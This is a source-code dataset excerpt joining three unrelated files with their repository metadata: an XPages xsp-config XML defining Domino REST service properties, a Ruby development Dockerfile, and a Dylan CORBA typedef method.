<designer-extension> <editor>com.ibm.xsp.extlib.designer.tooling.editor.FormNameEditor</editor> <tags> todo </tags> </designer-extension> </property-extension> </property> <!--- TODO BREAKING CHANGE POSSIBILITY onOpen, onSave, both - why boolean here ??? and above also !!! --> <property> <description>Validates documents by executing the default value, translation, and validation formulas defined in the form</description> <display-name>Compute With Form</display-name> <property-name>computeWithForm</property-name> <property-class>boolean</property-class> <property-extension> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <!-- TODO reference "maintain unread marks" or none of this applies --> <property> <description>Allow documents to be marked as having been read when referenced. This defaults to true, so that documents are marked as read, and can be set to false to prevent documents being marked as read.</description> <display-name>Mark Documents as Read</display-name> <property-name>markRead</property-name> <property-class>boolean</property-class> <property-extension> <designer-extension> <!-- This defaults to true at runtime, so it will only be possible to set the value in a theme file in release 8.5.3 or later using the baseValue attribute. runtime-default-true prevents a fail in BooleanPropertyDefaultTest --> <tags> runtime-default-true todo </tags> </designer-extension> </property-extension> </property> <!-- TODO BREAKING CHANGE POSSIBILITY ??? what's the use case ... as described, seems to apply to a doc collection --> <property> <!-- # "Session.createDateTime(String)" should not be translated. "API" should not be translated (it is a type of technical documentation - Application Programmer Interface) --> <description>The start date and time for collecting documents modified in a database. Only documents modified on or after the given date will be included in the search results. The format of the date text is described in the Domino API documents for: Session.createDateTime(String)</description> <display-name>Since Modified Date Text</display-name> <property-name>since</property-name> <property-class>java.lang.String</property-class> <property-extension> <!-- TODO why is this a localizable String, and not a Date, or a non-localizable Date-format String --> <!-- This property was marked as localizable in the initial release changed to non-localizable in version 8.5.32005. However the value should never have been localizable, and is actually likely to be computed, rather than hard-coded in the .xsp file, and it should not change per locale. --> <!-- <localizable>true</localizable> --> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <!-- TODO BREAKING CHANGE POSSIBILITY ??? what's the use case ... as described, seems to apply to a doc collection --> <property> <description>Text to search for in documents in a database. This value is searched for using full text search.</description> <display-name>Search Text</display-name> <property-name>search</property-name> <property-class>java.lang.String</property-class> <property-extension> <localizable>true</localizable> <designer-extension> <tags> localizable-text todo </tags> </designer-extension> </property-extension> </property> <!-- TODO BREAKING CHANGE POSSIBILITY ??? what's the use case ... as described, seems to apply to a doc collection --> <!-- TODO 853 new search features to be applied in due course ??? --> <property> <description>Maximum number of documents to include in the search result</description> <display-name>Maximum Search Documents</display-name> <property-name>searchMaxDocs</property-name> <property-class>int</property-class> <property-extension> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <!-- TODO resolve weirdness here - prop not understood and no sample available --> <property> <description>Output data type definition for types that are not native to JavaScript, such as date values</description> <display-name>Output Data Type Definition</display-name> <property-name>strongType</property-name> <property-class>boolean</property-class> <property-extension> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <!-- TODO explain that this is a list of fields to be included in the result set --> <property> <description>Items list</description> <display-name>Items</display-name> <property-name>items</property-name> <property-class>java.util.List</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <collection-property>true</collection-property> <property-item-class>com.ibm.xsp.extlib.component.rest.DominoDocumentItem</property-item-class> <property-add-method>addItem</property-add-method> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <!-- TODO can we get these to show up in Events panel ??? Talk to Graham --> <!-- TODO re above : if possible, add subcategories for event type, mouse, focus, keyboard etc --> <!-- TODO query : must note that event can return false (it's not just a "pre" event) --> <property> <description>Triggered before creating a new document</description> <display-name>Query New Document Method Binding</display-name> <property-name>queryNewDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <property> <description>Triggered before opening the document</description> <display-name>Query Open Document Method Binding</display-name> <property-name>queryOpenDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered before saving the document</description> <display-name>Query Save Document Method Binding</display-name> <property-name>querySaveDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered before deleting the document</description> <display-name>Query Delete Document Method Binding</display-name> <property-name>queryDeleteDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered after creating the document</description> <display-name>Post New Document Method Binding</display-name> <property-name>postNewDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered after opening the document</description> <display-name>Post Open Document Method Binding</display-name> <property-name>postOpenDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <property> <description>Triggered after saving the document</description> <display-name>Post Save Document Method Binding</display-name> <property-name>postSaveDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> </property-extension> </property> <!-- TODO interesting to test this ... what happens to var after doc is deleted ??? --> <property> <description>Triggered after deleting the document</description> <display-name>Post Delete Document Method Binding</display-name> <property-name>postDeleteDocument</property-name> <property-class>javax.faces.el.MethodBinding</property-class> <property-extension> <method-binding-property>true</method-binding-property> <designer-extension> <tags> todo </tags> </designer-extension> </property-extension> </property> <complex-extension> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoService</base-complex-id> </complex-extension> </complex-type> <!-- TODO Apply same criteria as Domino View Column --> <complex-type> <description>This configures an item or field in a Domino document to be returned by a Domino document service</description> <display-name>Domino Document Item</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoDocumentItem</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoDocumentItem</complex-class> <property> <description>The name given to the item when it is output by the document service. This can be different from the name in the underlying document.</description> <display-name>Name</display-name> <property-name>name</property-name> <property-class>java.lang.String</property-class> </property> <property> <description>The name of the item or field in the Domino document</description> <display-name>Item Name</display-name> <property-name>itemName</property-name> <property-class>java.lang.String</property-class> </property> <property> <description>Value to be displayed instead of the item value from the document. This is only used when the Item Name is absent.</description> <display-name>Value</display-name> <property-name>value</property-name> <property-class>java.lang.Object</property-class> </property> <complex-extension> <tag-name>restDocumentItem</tag-name> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> <complex-type> <description>Domino JSON Document service implementation</description> <display-name>Domino Document as Standard JSON</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoDocumentJsonService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoDocumentJsonService</complex-class> <group-type-ref>com.ibm.xsp.extlib.rest.json.options</group-type-ref> <complex-extension> <tag-name>documentJsonService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoDocumentService</base-complex-id> </complex-extension> </complex-type> <!-- TODO does this just return all the views in a db (only 3 props) --> <!-- TODO what's the use case? Does this need extra options to filter contents (and handle folders also) --> <complex-type> <description>Domino JSON view collection service implementation</description> <display-name>Domino View Collection as Standard JSON</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoViewCollectionJsonService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoViewCollectionJsonService</complex-class> <group-type-ref>com.ibm.xsp.extlib.rest.json.options</group-type-ref> <complex-extension> <tag-name>viewCollectionJsonService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoService</base-complex-id> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> <!-- TODO what does this do??? only 3 props... seems not very useful --> <complex-type> <description>Domino JSON Database collection service implementation</description> <display-name>Domino Database Collection as Standard JSON</display-name> <complex-id>com.ibm.xsp.extlib.component.rest.DominoDatabaseCollectionJsonService</complex-id> <complex-class>com.ibm.xsp.extlib.component.rest.DominoDatabaseCollectionJsonService</complex-class> <group-type-ref>com.ibm.xsp.extlib.rest.json.options</group-type-ref> <complex-extension> <tag-name>databaseCollectionJsonService</tag-name> <base-complex-id>com.ibm.xsp.extlib.component.rest.DominoService</base-complex-id> <designer-extension> <tags> todo </tags> </designer-extension> </complex-extension> </complex-type> </faces-config>
XPages
4
jesse-gallagher/XPagesExtensionLibrary
extlib/lwp/product/runtime/eclipse/plugins/com.ibm.xsp.extlib.domino/src/com/ibm/xsp/extlib/config/raw-extlib-domino-rest.xsp-config
[ "Apache-2.0" ]
FROM ruby:2.6 RUN apt-get update \ && apt-get install -y sudo golang --no-install-recommends RUN apt-get purge --auto-remove -y curl \ && rm -rf /var/lib/apt/lists/* RUN groupadd -r app && useradd -r -g app -G sudo app \ && mkdir -p /home/app && chown -R app:app /home/app RUN echo '%sudo ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers USER app # throw errors if Gemfile has been modified since Gemfile.lock RUN bundle config --global frozen 1 WORKDIR /home/app/workdir COPY Gemfile Gemfile.lock ./ RUN bundle install ENV LANG C.UTF-8 ENV USER app
Dockerfile
3
luthermonson/hub
Dockerfile
[ "MIT" ]
Module: scepter-ir-back-end-internal Author: Keith Dennison Copyright: Original Code is Copyright (c) 1995-2004 Functional Objects, Inc. All rights reserved. License: See License.txt in this distribution for details. Warranty: Distributed WITHOUT WARRANTY OF ANY KIND define method create-definition-in-container (back-end :: <ir-back-end>, node :: <ast-typedef>, container :: corba/<container>) => (irobject :: corba/<irobject>) let id = declarator-repository-id(node); let name = identifier-label(declarator-local-name(node)); let version = declarator-repository-id-version(node); let original-type = load-definition(back-end, node.typedef-base-type); corba/container/create-alias(container, id, name, version, original-type); end method;
Dylan
3
kryptine/opendylan
sources/corba/scepter/back-end/ir/typedef.dylan
[ "BSD-2-Clause" ]